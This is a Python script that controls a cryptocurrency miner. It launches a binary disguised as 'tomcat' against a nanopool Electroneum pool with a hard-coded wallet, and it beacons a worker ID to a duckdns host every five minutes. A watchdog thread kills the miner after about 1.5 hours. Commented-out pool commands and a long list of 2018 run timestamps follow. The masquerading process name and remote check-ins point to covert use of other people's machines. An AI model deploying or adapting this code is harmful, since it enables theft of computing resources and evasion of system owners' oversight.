import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:06.593485
#2018-02-17 17:39:06.540031
#2018-02-17 19:27:06.585960
#2018-02-17 21:16:02.199480
#2018-02-17 22:59:06.338488
#2018-02-18 00:47:05.052459
#2018-02-18 02:34:04.335783
#2018-02-18 04:20:07.648032
#2018-02-18 06:10:08.710512
#2018-02-18 08:01:06.416908
#2018-02-18 09:49:06.709891
#2018-02-18 11:36:07.431927
#2018-02-18 13:21:04.235845
#2018-02-18 15:11:05.270449
#2018-02-18 16:59:07.674778
#2018-02-18 18:47:01.254890
#2018-02-18 20:33:07.335587
#2018-02-18 22:19:05.189124
#2018-02-19 00:08:04.702068
#2018-02-19 01:54:06.022072
#2018-02-19 03:41:06.968650
#2018-02-19 05:26:01.564199
#2018-02-19 07:13:07.560209
#2018-02-19 09:02:07.469044
#2018-02-19 10:50:07.645748
#2018-02-19 12:38:01.935373
#2018-02-19 14:26:07.610135
#2018-02-19 16:14:07.953023
#2018-02-19 18:02:04.692098
#2018-02-19 19:48:01.937507
#2018-02-19 21:35:08.279924
#2018-02-19 23:23:01.582045
#2018-02-20 01:09:03.693609
#2018-02-20 02:58:07.774570
#2018-02-20 04:45:07.771635
#2018-02-20 06:29:01.357569
#2018-02-20 08:14:05.986461
#2018-02-20 09:59:03.688988
#2018-02-20 11:42:07.879478
#2018-02-20 13:29:04.614778
#2018-02-20 15:13:05.679431
#2018-02-20 16:57:01.270257
#2018-02-20 18:46:01.848080
#2018-02-20 20:39:03.874802
#2018-02-20 22:23:04.891113
#2018-02-21 00:04:06.069987
#2018-02-21 01:48:07.087195
#2018-02-21 03:31:08.093037
#2018-02-21 05:19:04.979181
#2018-02-21 07:07:08.213079
#2018-02-21 08:52:07.827835
#2018-02-21 10:39:08.455231
#2018-02-21 12:27:04.746030
#2018-02-21 14:13:09.197123
#2018-02-21 16:02:08.207059
#2018-02-21 17:54:05.088057
#2018-02-21 19:41:01.739344
#2018-02-21 21:27:07.448580
#2018-02-21 23:15:10.388805
#2018-02-22 01:04:06.652284
#2018-02-22 02:51:03.780699
#2018-02-22 04:38:07.315170
#2018-02-22 06:22:06.797429
#2018-02-22 08:09:01.375239
#2018-02-22 09:57:01.623760
#2018-02-22 11:42:01.959774
#2018-02-22 13:28:04.466693
#2018-02-22 15:16:06.823719
#2018-02-22 17:01:01.239533
#2018-02-22 18:49:07.862140
#2018-02-22 20:42:07.281245
#2018-02-22 22:28:07.429345
#2018-02-23 00:13:05.444499
#2018-02-23 02:01:02.118285
#2018-02-23 03:49:05.359522
#2018-02-23 05:42:01.589807
#2018-02-23 07:27:05.305050
#2018-02-23 09:33:07.056808
#2018-02-23 11:39:10.599787
#2018-02-23 13:29:07.812214
#2018-02-23 15:16:08.917981
#2018-02-23 17:04:08.862126
#2018-02-23 18:53:04.469869
#2018-02-23 20:40:07.860196
#2018-02-23 22:26:03.533754
#2018-02-24 00:13:04.926478
#2018-02-24 02:04:05.060643
#2018-02-24 03:55:08.671484
#2018-02-24 05:41:06.835706
#2018-02-24 07:32:07.709235
#2018-02-24 09:19:05.962060
#2018-02-24 11:08:07.128083
#2018-02-24 12:57:01.765833
#2018-02-24 14:45:03.664201
#2018-02-24 16:37:06.610376
#2018-02-24 18:26:01.649858
#2018-02-24 20:12:07.526245
#2018-02-24 21:58:07.094171
#2018-02-25 02:29:06.024719
#2018-02-25 06:09:06.212204
#2018-02-25 11:38:07.211796